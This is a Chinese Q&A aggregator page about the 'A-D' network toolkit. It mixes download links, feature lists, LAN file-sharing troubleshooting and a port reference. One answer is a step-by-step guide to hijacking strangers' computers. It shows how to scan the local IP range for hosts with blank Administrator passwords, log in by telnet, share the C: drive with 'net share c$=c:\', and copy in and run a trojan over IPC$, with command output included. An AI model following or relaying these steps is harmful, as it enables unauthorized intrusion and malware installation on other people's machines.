導航:首頁 > 凈水問答 > 啊d過濾11

啊d過濾11

發布時間:2022-05-12 01:44:33

1. 在我使用啊D注入的時候,為啥系統提示我所注入的網址不能使用SQL注入

樓主,因為那個網址不能注入啊。請你知道什麼叫SQL注入。sql注入漏洞的產生是由於寫代碼的時候沒過濾好所以才產生的。詳細的你可以M我

2. 誰給我一個啊D網路工具包詳細的使用教程

1. 共享資源查找 [為你查找網上的共享資源!]2. 肉雞查找 [查找一個網段NT,Win2000密碼過於簡單的主機,還加入了系統版本識別,使用更方便]3. 遠程服務查看 [你可以查看和修改遠程的服務,如關閉和啟動Telnet,更方便!]4. 查看隱藏共享 [查看遠程計算機的全部共享,包括隱藏的共享也可以查看的到,查看共享更方便]5. 查看用戶組信息 [Win介面的查看遠程機子的用戶和組的信息,便用更方便!]6. 開遠程的Telnet [直截開啟微軟自帶的Telnet,開Telnet,原來也可以這么簡單!]3. NT消息發送 [向NT的機子發送消息,便用Win介面使用更方便!]3. IP埠掃描 [有針對性的查看整個網段的某個埠,如冰河埠7626]4. 埠掃描 [使你更加了解對方主機埠的打開狀況]5. 網卡MAC [快速獲取一個網段的 用戶名、工作組、對方的網卡MAC地址]6. 網路狀態查看 [想知道自己機子打開了什麼埠嗎?本程序可幫上你的忙!]7. 主機查詢 [想知道IP的的所在地?想知道某地有哪些IP,本程序可幫上你的忙!]8. Ping [判斷某IP是否和網路連接的好幫手!]9. 域名<=>IP [想知道域名對應的IP,想知道IP對應的域名,本程序可以幫助你!]10. 路由查看 [想知道某IP經過的路由?用本程序就可以給你答案!]11. Finger [Finger能為你查詢對方系統的用戶信息!]12. 進程查看 [查看正在運行的軟體,查木馬還是有一定的幫助的!]13. 本機IP [在上網的時候,想知道自己的IP嗎?本程序可以為你辦到!]14. 常用修改 [反惡意網頁修改,恢復系統設置等]19. 查錯誤代號說明 [不知道51這個代號表示什麼錯誤,查一查就知道了!]這里有啊D網路工具包下載,並且教程也有下載! http://www.d99net.net/article.asp?id=3

3. 求最新啊D工具包下載地址

啊D網路工具包 V2.02
http://www.ysye.com/soft/181.html
這個可以下載

4. 如何使用啊D

現在最流行的抓雞方法就是用啊D工具包抓本地肉雞,有很多人都說用啊D 工具包掃不到肉雞,其實掃描的ip也是有技巧的,網上有很多抓135肉雞的教程,可都講的比較模糊,尤其掃的ip更是隻字不提,這樣新手以為隨便找段ip就可以了,可是掃了半天什麼也沒有,都在納悶,為什麼別人可以掃到,我就掃不到?原因就是沒找到本地的ip段。。。
首先打開IE在地址欄輸入http://www.ip138.com,打開後刷新一下就是你外網的ip,也就是公網ip,例如你的ip是218.76.40.145,那你就在啊D工具的肉雞查找的ip框里輸入218.76.40.1,後面的ip會自動顯示為218.76.40.255這個我們不用管,下面點擊設置--選猜測administrator只帳號並關閉。
現在大家掃一下看看,是不是可以掃到很多呢。我想應該可以掃到很多。

掃到了以後就要telnet對方的主機了,具體步驟右擊IP地址: 222.189.115.242 Administrator (空) WinXP [5.1] 打開對方的telnet 並選擇啟動很快就可以登陸到對方的主機,輸入用戶名Administrator 密碼為空直接回車就可以了,進入後先開啟c盤做共享,命令是net share c$=c:\,例如
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\Documents and Settings\Administrator>net share c$=c:\
c$ 共享成功。

C:\Documents and Settings\Administrator>
共享開啟成功就可以種植你的木馬了,右擊IP地址: 222.189.115.242 Administrator (空) WinXP [5.1]選擇木馬(IPC$)種植機把木馬種植到c盤最後顯示無效的句柄,
如:建立 \\222.189.115.211\IPC$ 管道.... OK!
復制文件到對方主機.... OK!
讀取對方機子的時間.... 2006-08-20 15:55 OK!
在對方機子添加任務....
錯誤: 1702 綁定句柄無效。
--------------------------------------------------
我們必須手工運行。。先用dir查看一下如:

C:\ 的目錄

2006-01-02 01:55 <DIR> WINDOWS
2006-01-02 02:00 <DIR> Documents and Settings
2006-01-02 02:12 <DIR> Program Files
2006-01-11 02:58 <DIR> Ghost
2006-01-12 02:58 <DIR> boot
2006-05-17 09:42 42,377,996 Rav18_26_12.exe
2006-05-17 09:59 <DIR> RAVBIN
2006-05-17 20:01 <DIR> csc108
2006-06-06 21:41 <DIR> Othello
2006-06-15 19:01 223 cmd.txt
2006-06-15 19:01 4 response.txt
2006-06-14 20:26 34,466 VETlog.dmp
2006-06-14 20:26 1,467 VETlog.txt
2006-06-18 11:20 <DIR> Downloads
2006-06-18 11:51 <DIR> QQFO
2006-07-03 10:24 376 NatTest16477656.txt
2006-07-03 10:24 378 NatTest16478888.txt
2006-08-20 15:55 319,319 2.exe
8 個文件 42,734,229 位元組
10 個目錄 5,185,863,680 可用位元組

C:\>
2006-08-20 15:55 319,319 2.exe這就是我上傳的木馬,在C:\>後面輸入2.exe回車木馬就運行了如:
C:\>2.exe

5. 高手:啊D網路工具包怎麼使區域網未共享的電腦共享!

Windows操作系統區域網不能互訪解決方法

在區域網內安裝了Windows XP的電腦不能與安裝了Windows 98的電腦互相訪問,安裝了Windows XP的電腦與安裝了Windows XP的電腦也不能互相通信。在工作站訪問伺服器時,工作站的「網上鄰居」中可以看到伺服器的名稱,但是點擊後卻無法看到任何共享內容,或者提示找不到網路徑、無權訪問等問題,歸納為以下幾點:
在XP首次使用的時候要在網上鄰居的屬性裡面新建一個網路連接進行網路安裝向導。

1、檢查計算機之間的物理連接

網卡是網路連接的基本設備,在桌面計算機中,每個網卡後面的指示燈應該是亮的,這表示連接是正常的。如果不亮,請檢查集線器或交換機是打開的,而且每個客戶端連接的指示燈都是亮的,這表示鏈接是正常的。接下來檢查網線的水晶頭是否接觸良好。

2、確保所有計算機上都安裝了TCP/IP,並且工作正常

在Windows XP中默認安裝了TCP/IP。但是,如果出了網路問題想卸載後重新安裝TCP/IP就不容易了:在「本地連接」屬性中顯示的此連接使用下列項目列表中單擊Internet協議(TCP/IP)項,您將發現卸載按鈕不可用(被禁用)。

這是因為傳輸控制協議/Internet協議(TCP/IP)堆棧是Microsoft XP/ 2003的核心組件,不能刪除。在這種情況下,如果需要重新安裝TCP/IP以使TCP/IP堆棧恢復為原始狀態。可以使用NetShell實用程序重置TCP/IP堆棧,使其恢復到初次安裝操作系統時的狀態。方法是:在命令提示符後鍵入以下命令,然後按ENTER鍵:netsh int ip reset c:\resetlog.txt,其中,Resetlog.txt記錄命令結果的日誌文件,一定要指定,這里指定了Resetlog.txt日誌文件及完整路徑。運行此命令的結果與刪除並重新安裝TCP/IP協議的效果相同。

3、使用ping命令測試網路中兩台計算機之間的連接:

ping其它計算機IP,在命令提示處,鍵入ping x.x.x.x(其中x.x.x.x是另一台計算機的IP地址),然後按ENTER鍵。應該可以看到來自另一台計算機的幾個答復,如:

Reply from x.x.x.x:bytes=32 time<1ms TTL=128

如果沒有看到這些答復,或者看到"Request timed out",說明本地計算機可能有問題。如果ping命令成功執行,那麼您就確定了計算機可以正確連接,可以跳過下一步。如果沒有看到這些答復,或者看到"Request timed out",說明本地計算機可能有問題。PING本地IP,如果看到"Request timed out",說明本地計算機可能有問題。

4、使用ping命令測試網路中名稱解析是否正常

ping computername,其中computername是遠程計算機的名稱。通過ping命令用名稱測試計算機連接。確定計算機的名稱的方法是:在命令提示處,輸入SYSTEMINFO。或者在桌面上右擊我的電腦-屬性,然後單擊計算機名稱選項卡。如果看到該命令的成功答復,說明您在計算機之間具有基本連接和名稱解析。名稱解析跟NETBIOS密切相關,看下面的步驟。

5、正確安裝網路組件

首先右擊網上鄰居-屬性,選擇要共享的網卡。把IP設置在區域網的同一個網段上。比如192.168.1.X網段。然後看一下TCP/IP的高級屬性中,是否開啟NETBIOS。

在利用WINNT4.0構建的網路系統中,對每一台主機的唯一標識信息是它的NetBIOS名,系統是利用WINS服務、信息廣播方式及Lmhost文件等多種模式將NetBIOS名解析為相應IP地址,從而實現信息通訊。

在內部網路系統中(也就是通常我們所說的區域網中),利用NetBIOS名實現信息通訊是非常方便、快捷的。但是在Internet上對一台主機的唯一標識信息是它的FQDN格式的域名(163.com),在Internet是利用DNS標准來實現將域名解析為相應IP地址,WIN2K支持動態DNS,運行活動目錄服務的機器可動態地更新DNS表。

WIN2K網路中可以不再需要WINS服務,但是WIN2K仍然支持WINS,這是由於向後兼容的原因。目前,大多數網路是混合網,既有Win98等系統,又有WINXP/WIN2K等系統,因此需要在TCP/IP協議上捆綁NETBIOS解析計算機名。

查看是否選定「文件和列印服務」組件,如果已將其取消選中,「瀏覽服務」將不綁定到NetBIOS介面。成為備份瀏覽器並且沒有啟用「文件和列印共享」的基於Windows的計算機無法將瀏覽列表與客戶機共享。任何將要包括在瀏覽列表中的計算機也都必須啟用「文件和列印共享」。

6、啟用列印與文件共享

在網上鄰居和本地連接屬性里可以看到是否安裝了列印機與文件共享。驗證:如果在網上鄰居中看不到自己的機器,說明你沒有安裝列印機與文件共享。

7、啟動"計算機瀏覽器"服務

計算機瀏覽器"服務在網路上維護一個計算機更新列表,並將此列表提供給指定為瀏覽器的計算機。如果停止了此服務,則既不更新也不維護該列表。

WIN2K/XP要確保計算機瀏覽服務正常啟動。打開計算機管理->服務和應用程序->服務,在右窗中確保「Computer Browser」沒有被停止或禁用。

8、運行網路標識向導

我的電腦選擇「屬性」,然後單擊「計算機名」選項卡單擊「網路 ID」按鈕,開始「網路標識向導」:單擊「下一步」,選擇「本機是商業網路的一部分,用它連接到其他工作著的計算機」;單擊「下一步」,選擇「公司使用沒有域的網路」;單擊「下一步」按鈕,然後輸入你的區域網的工作組名,再次單擊「下一步」按鈕,最後單擊「完成」按鈕完成設置。

9、Win2k安裝NetBEUI協議

在Win2k中NetBEUI協議是一個高效協議在區域網中使,因此必須安裝此協議:

網上鄰居->屬性->本地連接->屬性---->安裝------>協議------->NetBEUI Protocol

10、起用Guest(來賓)帳戶

Windows XP的Guest帳戶允許其他人使用你的電腦,但不允許他們訪問特定的文件,也不允許他們安裝軟體。對Windows XP Home Edition計算機或工作組中的Windows XP Professional計算機的所有網路訪問都使用來賓帳戶。使用net user guest確保為網路訪問設置了來賓帳戶,如果該帳戶是活動的,命令輸出中會出現一行類似下面這樣的內容:Account active Yes;如果該帳戶不是活動的,請使用下面的命令授予來賓帳戶網路訪問:

net user guest /active:yes

或者打開控制面板->用戶帳戶或者在管理工具->計算機管理->本地用戶和組中打開Guest帳戶

11、允許Guest(來賓)帳號從網路上訪問

在運行里輸入gpedit.msc,彈出組策略管理器,在『計算機配置-Windows設置-本地策略-用戶權利指派』中,有「拒絕從網路訪問這台計算機」策略阻止從網路訪問這台計算機,如果其中有GUEST帳號,解決辦法是刪除拒絕訪問中的GUEST帳號。

12、防火牆

確保WINXP自帶的防火牆沒有開啟,打開本地連接屬性->高級,關掉Internet連接防火牆。如果使用了第三方的防火牆產品,參考其使用手冊,確保防火牆沒有禁止以下埠的通訊:UDP-137、UDP-138、TCP-139、TCP-445(僅WIN2K及以後的操作系統)。

Windows XP最新的SP2補丁對ICF做了很大的改進,功能更強大了,ICF有了自己的設置項,安裝SP2後,默認情況下,啟用ICF防火牆,不允許任何外部主動連接,即使是本地的應用程序要訪問網路也需要在許可列表中做設置。

但是防火牆阻斷正常的網路瀏覽服務通訊,結果是別人在網上鄰居中看不到你的計算機,有沒有兩全其美的辦法在開啟防火牆的前提下允許瀏覽服務。

辦法是,如果開啟了ICF,打開屬性,在服務這欄,選擇添加,添加服務的對話框共有四個編輯框,最上邊是描述服務名稱,以便於記憶,從上到下第二個是應用服務的IP地址或名稱,輸入127.0.0.1表示本機。

下面連個是內外埠號,旁邊的tcp/udp標示這個埠是udp連接還是tcp連接。

按照下面的表格輸入3個服務

名稱 協議 埠

NetBIOS Name Service UDP 137

NetBIOS Datagram Service UDP 138

NetBIOS Session Service TCP 139

137/UDP -- NetBIOS名稱伺服器,網路基本輸入/輸出系統(NetBIOS)名稱伺服器(NBNS)協議是TCP/IP上的NetBIOS (NetBT)協議族的一部分,它在基於NetBIOS名稱訪問的網路上提供主機名和地址映射方法。

138/UDP -- NetBIOS數據報,NetBIOS數據報是TCP/IP上的NetBIOS (NetBT)協議族的一部分,它用於網路登錄和瀏覽。

139/TCP -- NetBIOS會話服務,NetBIOS會話服務是TCP/IP上的NetBIOS (NetBT)協議族的一部分,它用於伺服器消息塊(SMB)、文件共享和列印。

13、檢查RPC、Plug and Play服務已啟動,檢查相應的系統文件夾的許可權,重新注冊以下的動態鏈接庫

regsvr32 netshell.dll

regsvr32 netcfgx.dll

regsvr32 netman.dll

14、設置帳號和密碼

由於WinNT內核的操作系統,在訪問遠程計算機的時候,好像總是首先嘗試用本地的當前用戶名和密碼來嘗試,可能造成無法訪問,在這里把用戶密碼添加進去就可以了。

15、多種方法訪問「網路計算機」

例如要打開網路中名為「Killer」的計算機,其IP地址為192.168.1.8,如果你不清楚其它機器的IP地址,你可以使用「PING計算機名」來獲得它的IP地址。

用計算機名訪問,NETBIOS提供的服務。點擊「開始」菜單,單擊「運行」,在地址欄輸入「\Killer」,單擊「確定」。

用IP地址訪問,在地址輸入欄中輸入「\192.168.1.8」,單擊「確定」。

用搜索計算機的方法訪問,計算機更新列表需要時間,搜索計算機可以加快更新列表。點擊「網上鄰居」右鍵中的「搜索計算機」,輸入計算機名,點擊「立即搜索」,就可以看到你要訪問的計算機。直接雙擊右邊計算機名就可以打開它了。

用映射驅動器的方法訪問,進入DOS方式,輸入「NET VIEW \killer」,回車�這是查看計算機Killer上有哪些共享文件夾,如D。再輸入NET USE Z:\Killer\D�將計算機IBM-ZB共享的文件夾D映射為H:盤,在命令提示符下鍵入「Z:」。你會發現你已經連到Killer計算機上了。

1、 兩台機子都添加NETBIOS協議,
2、兩台啟用guest帳號
3、文件夾開啟共享,
4、開始--運行裡面輸入\\對方IP 回車。。OK,
還有一種方法可以省去第三步:
開始--運行裡面輸入\\對方IP\你要訪問的盤符$ 回車
舉例: \\192.168.1.3\C$
然後會彈出一個「連接到****」的窗口,你輸入對方機子的用戶名(默認administrator)密碼(沒設為空)就可以了,用戶名密碼可以到「我的電腦-屬性-管理-本地用戶和組」進行管理。
網上鄰居十大經典應用技巧
現在人們已經日益習慣使用「網上鄰居」進行文件的拖移共享,方便快捷。但是你知道嗎,「網上鄰居」這么個小組件卻有許許多多的使用技巧!今天我們就抱以寓學於玩的目的為大家奉上「網上鄰居」精妙玩法TOP10!

10 網上鄰居協議巧妙設置技法

有人說為什麼他的計算機桌面中沒有網上鄰居圖標呀?其實這是沒有正確設置網上鄰居協議引起的,要想讓網上鄰居正常發揮作用,大家必須合理設置一個名叫NetBEUI的網路協議。由於在默認狀態下無論是Windows 98操作系統還是Windows 2000操作系統,都不會自動安裝這個協議的;要是不安裝這個NetBEUI網路協議的話,那麼我們日後直接通過網上鄰居圖標來訪問區域網中的其他工作站時,可能會出現各種莫名其妙的錯誤,例如在打開的網上鄰居窗口中可能會發現區域網內的許多工作站都不能被訪問到,而且其他人在網上鄰居中也看不到你的計算機名字。具體設置的方法為:首先在Windows 2000桌面上找到「網上鄰居」圖標,然後用滑鼠右鍵單擊該圖標,從隨後打開的右鍵快捷菜單中執行「屬性」命令;接著在「本地連接」上再用滑鼠右鍵單擊之,從其後打開的快捷菜單中執行「屬性」命令,在屬性對話框中單擊「安裝」按鈕;然後選擇「協議」,並執行「添加」命令;在出現的協議選擇列表框中,大家可以用滑鼠選擇「NetBEUI」這個協議,再單擊「確定」按鈕;隨後系統可能會彈出一個提示對話框,要求大家在光碟機中放入Windows 2000安裝盤,最後根據屏幕的安裝向導提示來完成協議的安裝任務。

實用指數:★★★ 驚奇指數:★ 綜合指數:★★☆

9 網上鄰居搜索法查詢技法

大家知道用滑鼠雙擊Windows系統桌面上的「網上鄰居」圖標時,就會將連接在網上的計算機找到;要是大家不能在網上鄰居的窗口中找到自己需要尋找的計算機名字,而需要尋找的計算機又的確是連接在區域網中時,大家就不能再通過普通的方法來查詢網上鄰居的工作站了。大家可以嘗試使用「搜索計算機」的方法,來找到需要訪問的網上鄰居中的計算機,具體操作步驟為:用滑鼠依次單擊Windows系統桌面上的「開始」/「搜索」/「搜索計算機」命令,在隨後現的對話框中,輸入要尋找的共享計算機名字,再用滑鼠單擊一下「立即搜索」按鈕,要不了多長時間,網上鄰居中指定的計算機就會出現在搜索結果頁面中了。

實用指數:★★★★ 驚奇指數:★★ 綜合指數:★★★

8 網上鄰居IP快速訪問技法

倘若自己計算機中的網上鄰居圖標無效的話,大家可以使用IP地址來快速訪問網上鄰居的共享計算機,這種訪問方法通常適用於不知道網上鄰居中的共享計算機名字的情況下。比方說,大家要訪問的網上鄰居共享計算機的IP地址為192.168.0.1時,那麼大家可以按照下面的步驟來訪問網上鄰居中的共享計算機:首先在Windows系統桌面上,執行「開始」菜單,從彈出的列表中選中「運行」命令,接著再在運行對話框中輸入「192.168.0.1」,並單擊確定按鈕就能看到自己需要訪問的共享計算機了。

實用指數:★★★★★ 驚奇指數:★★★ 綜合指數:★★★★

7 網上鄰居使用名字訪問技法

在Windows操作系統下,大家可以用被訪問的網上鄰居中的共享計算機名字作為網路連接命令,來訪問指定的共享計算機;比方說,大家想要訪問網上鄰居中的共享計算機XXX時,可以先用滑鼠依次單擊「開始」/「運行」命令,在隨後彈出的運行對話框中,輸入「XXX」,接著直接單擊該對話框中的確定按鈕,隨後大家就能訪問到網上鄰居中指定計算機上的內容了。

實用指數:★★★★★ 驚奇指數:★★★★ 綜合指數:★★★★☆
6 網上鄰居垃圾信息清理技法

在Win98系統中,使用區域網的用戶在訪問網路鄰居時,注冊表會在HEKY_CURRENT_USER\Network\Recent主鍵項中記錄下一系列命令操作的信息,包含被訪問機器的名字、訪問過的應用程序及文件名等,如:主鍵Recent包含一名為\ierl_server\software的子主鍵項,表示你曾訪問過名為ierl_server的伺服器中的software文件夾,點擊此項後編輯器右窗顯示此項的名稱及鍵值。這些內容基本沒有用途,可以適當地清理一下。打開注冊表編輯器後,按以下順序依次打開各級主鍵:HEKY_CURRENT_USER\Network\Recent,然後把主鍵Recent的子項刪除即可。

實用指數:★★★★★ 驚奇指數:★★★★★ 綜合指數:★★★★★

5 網上鄰居訪問速度提升技法

現在使用網上鄰居進行信息交流往往是許多區域網用戶們的首選,但許多人常常感覺到自己在通過網上鄰居圖標訪問其他共享信息時,速度非常緩慢;其實大家可以通過下面的方法來提升網上鄰居訪問速度:首先在Windows系統桌面上單擊開始菜單中的運行,在打開的運行對話框中輸入regedit命令,這樣系統就能打開注冊表編輯窗口了;在這個窗口中大家可以依次訪問HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current ersion/Explorer/RemoteComputer/NameSpace分支,並將對應NameSpace分支下面的子鍵刪除掉,然後關閉注冊表、重新啟動計算機就可以了。

實用指數:★★★★★★ 驚奇指數:★★★★★★ 綜合指數:★★★★★★

4 網上鄰居DOS訪問技法

要是哪天不幸運,Windows系統突然不能正常啟動了,而此時要非常著急通過網路來訪問網上鄰居中的共享資源時,大家該如何操作呢?利用網上鄰居圖標來訪問肯定是不現實的了,因為在DOS狀態下根據就沒有什麼圖標,那麼我們到底該如何在DOS狀態下訪問共享資源呢?其實DOS狀態下的NET命令可以幫助大家實現這一願望,大家只要在DOS命令提示符下輸入「NET VIEW XXX」命令(其中XXX表示網上鄰居中的共享計算機名字),再直接回車,就能查看共享計算機XXX上的資源文件了;要是大家輸入「NET USE F:XXXYYY」命令的話,就可以將網上鄰居中共享計算機XXX上的YYY目錄映射為本地計算機中的F盤了,以後大家可以直接在命令提示符下鍵入「F:」,就能對網上鄰居中的共享資源進行相關操作了。

實用指數:★★★★★★ 驚奇指數:★★★★★★ 綜合指數:★★★★★★☆3 網上鄰居指定域快速登錄技法

在區域網中,有時為了管理上的方便經常首先建立主域控制器和備份域控制器,在該域中為每位用戶設立用戶名,並將大量的信息資源存放在該域的成員伺服器內。而普通工作站要能正常訪問存放在成員伺服器中的資料,在啟動時就必須首先登錄到這個域。為此,大家就必須對工作站機器進行以下設置:首先在Windows桌面的「網上鄰居」圖標上單擊滑鼠右鍵,從隨後彈出的快捷菜單中執行「屬性」命令;在打開的屬性對話框中,大家可以選擇「Microsoft網路客戶」,接著再用滑鼠單擊「屬性」按鈕;在彈出的對話框中,將「登錄到Windows NT域」選中,同時在該設置欄的文本框中輸入計算機要自動登錄的域名,單擊單擊「確定」按鈕並重新啟動計算機就可以了。

倘若工作站使用的是Windows 2000操作系統的話,大家可以按照下面的設置步驟來保證計算機能自動登錄到指定域上,同時又能對本地計算機具有一切操作權:首先向區域網管理員申請登錄到伺服器主域所需要的用戶名和密碼,同時以超級管理員身份登錄到本地計算機中;接下來依次執行「程序」/「管理工具」/「計算機管理」命令,在隨後打開的窗口中展開「用戶和組」,選擇「組」;然後在用滑鼠右鍵單擊「Administrators」圖標,在打開的快捷菜單中選擇「添加到組」命令;下面按照屏幕提示,把用戶向管理員申請的用戶添加到Administrators組中;當選擇伺服器所使用的域名時,計算機將會要求大家輸入訪問該域許可權的用戶名和密碼,大家必須正確輸入事先申請好的用戶名和密碼,設置完畢後,重新啟動計算機就可以了。

實用指數:★★★★★★ 驚奇指數:★★★★★★★★ 綜合指數:★★★★★★★

2 無效共享文件夾刪除技法

在網上鄰居中傳輸文件時,我們一般都是先將文件存放在某一文件夾中,然後將文件夾設置為共享,這樣就可以直接使用移動、復制的方式來實現文件交流傳輸的目的;可是,在預設情況下,文件夾的共享方式即使已經被解除了,我們還能夠在「網上鄰居」看到共享的文件夾名,不過該文件夾已經無效了。為了將這個無效的共享文件夾刪除掉,我們可以按如下步驟來操作:

首先打開運行對話框,在其中輸入注冊表編輯命令「regedit」,來打開注冊表編輯器窗口;執行該界面中的「編輯」菜單項,選中下面的「查找」命令,在隨後出現的查找設置窗口中,輸入共享文件夾的具體名稱,同時選中該窗口中的「主鍵」復選項,接著執行「查找下一個」命令;過一會兒,注冊表編輯器將打開了HKEY_ LOCAL_分支,在對應LanMan鍵值的右邊區域中,我們可以找到共享的文件夾名稱;用滑鼠右鍵單擊該文件夾名稱,從打開的快捷菜單中,執行「刪除」命令,最後退出注冊表編輯窗口,重新啟動一下系統,再次打開網上鄰居時,我們就看不到無效的共享文件夾名稱了。

當然,還有一種更為簡單的刪除方法,那就是先在本地計算機中,創建一個空文件夾,並將該文件夾的共享名稱設置為與「網上鄰居」中無效文件夾相同的名稱,,這樣屏幕上將打開一個文件夾出現共享沖突的提示,此時我們可以執行提示框中的「是」命令,就能刪除無效共享文件夾了!

實用指數:★★★★★★★ 驚奇指數:★★★★★★★★★ 綜合指數:★★★★★★★★

1 網上鄰居刪除技法

有時為了安全,需要將網上鄰居圖標從系統桌面上刪除掉。刪除網上鄰居最方便的方法是直接在網路設置中將NetBEUI和IPX/SPX協議刪除掉,具體操作為:首先打開「控制面板」窗口,在這個窗口中打開「網路」屬性對話框,然後在該對話框里將NetBEUI和IPX/SPX兩種協議選中,並執行刪除命令;接著用滑鼠右鍵單擊「撥號網路」圖標,從彈出的右鍵菜單中執行「屬性」命令,在其後出現的對話框中選擇「伺服器類型」,並在其中將NetBEUI和IPX/SPX兩項選取消,最後重新啟動計算機就可以了。
註:轉載

6. .啊D網路工具包

您好!
啊D網路工具包有下列功能:
1. 共享資源查找 [為你查找網上的共享資源!]
2. 肉雞查找 [查找一個網段NT,Win2000密碼過於簡單的主機]
3. IP埠掃描 [有針對性的查看整個網段的某個埠,如冰河埠7626]
4. 埠掃描 [使你更加了解對方主機埠的打開狀況]
5. 網卡MAC [快速獲取一個網段的 用戶名、工作組、對方的網卡MAC地址]
6. 網路狀態查看 [想知道自己機子打開了什麼埠嗎?本程序可幫上你的忙!]
7. 主機查詢 [想知道IP的的所在地?想知道某地有哪些IP,本程序可幫上你的忙!]
8. Ping [判斷某IP是否和網路連接的好幫手!]
9. 域名<=>IP [想知道域名對應的IP,想知道IP對應的域名,本程序可以幫助你!]
10. 路由查看 [想知道某IP經過的路由?用本程序就可以給你答案!]
11. Finger [Finger能為你查詢對方系統的用戶信息!]
12. 進程查看 [查看正在運行的軟體,查木馬還是有一定的幫助的!]
13. 本機IP [在上網的時候,想知道自己的IP嗎?本程序可以為你辦到!]
14. 常用修改 [反惡意網頁修改,恢復系統設置等]
15. 查錯誤代號說明 [不知道51這個代號表示什麼錯誤,查一查就知道了!]

-----------------全心全意為人民服務!---------------
您好,我是互聯網網友專家。
如果我的答案對您有幫助,那麼我倍感欣慰,您的支持就是我前進的動力!
如果我的答案不夠清楚、詳細,那麼我會繼續努力做的更好!

7. 體佛山邊度有520同ESSE啊D女人煙買

7-11應該有,而家好多間7-11,我記得東方廣場好又多果邊有一間,同濟廣場附近有一間,中醫院附近有一間

8. 如何關閉啊D肉機

埠:161
在推薦你看看其他的

埠:0
服務:Reserved
說明:通常用於分析操作系統。這一方法能夠工作是因為在一些系統中「0」是無效埠,當你試圖使用通常的閉合埠連接它時將產生不同的結果。一種典型的掃描,使用IP地址為0.0.0.0,設置ACK位並在乙太網層廣播。

埠:1
服務:tcpmux
說明:這顯示有人在尋找SGI Irix機器。Irix是實現tcpmux的主要提供者,默認情況下tcpmux在這種系統中被打開。Irix機器在發布是含有幾個默認的無密碼的帳戶,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。許多管理員在安裝後忘記刪除這些帳戶。因此HACKER在INTERNET上搜索tcpmux並利用這些帳戶。

埠:7
服務:Echo
說明:能看到許多人搜索Fraggle放大器時,發送到X.X.X.0和X.X.X.255的信息。

埠:19
服務:Character Generator
說明:這是一種僅僅發送字元的服務。UDP版本將會在收到UDP包後回應含有垃圾字元的包。TCP連接時會發送含有垃圾字元的數據流直到連接關閉。HACKER利用IP欺騙可以發動DoS攻擊。偽造兩個chargen伺服器之間的UDP包。同樣Fraggle DoS攻擊向目標地址的這個埠廣播一個帶有偽造受害者IP的數據包,受害者為了回應這些數據而過載。

埠:21
服務:FTP
說明:FTP伺服器所開放的埠,用於上傳、下載。最常見的攻擊者用於尋找打開anonymous的FTP伺服器的方法。這些伺服器帶有可讀寫的目錄。木馬Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所開放的埠。

埠:22
服務:Ssh
說明:PcAnywhere建立的TCP和這一埠的連接可能是為了尋找ssh。這一服務有許多弱點,如果配置成特定的模式,許多使用RSAREF庫的版本就會有不少的漏洞存在。

埠:23
服務:Telnet
說明:遠程登錄,入侵者在搜索遠程登錄UNIX的服務。大多數情況下掃描這一埠是為了找到機器運行的操作系統。還有使用其他技術,入侵者也會找到密碼。木馬Tiny Telnet Server就開放這個埠。

埠:25
服務:SMTP
說明:SMTP伺服器所開放的埠,用於發送郵件。入侵者尋找SMTP伺服器是為了傳遞他們的SPAM。入侵者的帳戶被關閉,他們需要連接到高帶寬的E-MAIL伺服器上,將簡單的信息傳遞到不同的地址。木馬Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個埠。

埠:31
服務:MSG Authentication
說明:木馬Master Paradise、Hackers Paradise開放此埠。

埠:42
服務:WINS Replication
說明:WINS復制

埠:53
服務:Domain Name Server(DNS)
說明:DNS伺服器所開放的埠,入侵者可能是試圖進行區域傳遞(TCP),欺騙DNS(UDP)或隱藏其他的通信。因此防火牆常常過濾或記錄此埠。

埠:67
服務:Bootstrap Protocol Server
說明:通過DSL和Cable modem的防火牆常會看見大量發送到廣播地址255.255.255.255的數據。這些機器在向DHCP伺服器請求一個地址。HACKER常進入它們,分配一個地址把自己作為局部路由器而發起大量中間人(man-in-middle)攻擊。客戶端向68埠廣播請求配置,伺服器向67埠廣播回應請求。這種回應使用廣播是因為客戶端還不知道可以發送的IP地址。

埠:69
服務:Trival File Transfer
說明:許多伺服器與bootp一起提供這項服務,便於從系統下載啟動代碼。但是它們常常由於錯誤配置而使入侵者能從系統中竊取任何 文件。它們也可用於系統寫入文件。

埠:79
服務:Finger Server
說明:入侵者用於獲得用戶信息,查詢操作系統,探測已知的緩沖區溢出錯誤,回應從自己機器到其他機器Finger掃描。

埠:80
服務:HTTP
說明:用於網頁瀏覽。木馬Executor開放此埠。

埠:99
服務:Metagram Relay
說明:後門程序ncx99開放此埠。

埠:102
服務:Message transfer agent(MTA)-X.400 over TCP/IP
說明:消息傳輸代理。

埠:109
服務:Post Office Protocol -Version3
說明:POP3伺服器開放此埠,用於接收郵件,客戶端訪問伺服器端的郵件服務。POP3服務有許多公認的弱點。關於用戶名和密碼交 換緩沖區溢出的弱點至少有20個,這意味著入侵者可以在真正登陸前進入系統。成功登陸後還有其他緩沖區溢出錯誤。

埠:110
服務:SUN公司的RPC服務所有埠
說明:常見RPC服務有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

埠:113
服務:Authentication Service
說明:這是一個許多計算機上運行的協議,用於鑒別TCP連接的用戶。使用標準的這種服務可以獲得許多計算機的信息。但是它可作為許多服務的記錄器,尤其是FTP、POP、IMAP、SMTP和IRC等服務。通常如果有許多客戶通過防火牆訪問這些服務,將會看到許多這個埠的連接請求。記住,如果阻斷這個埠客戶端會感覺到在防火牆另一邊與E-MAIL伺服器的緩慢連接。許多防火牆支持TCP連接的阻斷過程中發回RST。這將會停止緩慢的連接。

埠:119
服務:Network News Transfer Protocol
說明:NEWS新聞組傳輸協議,承載USENET通信。這個埠的連接通常是人們在尋找USENET伺服器。多數ISP限制,只有他們的客戶才能訪問他們的新聞組伺服器。打開新聞組伺服器將允許發/讀任何人的帖子,訪問被限制的新聞組伺服器,匿名發帖或發送SPAM。

埠:135
服務:Location Service
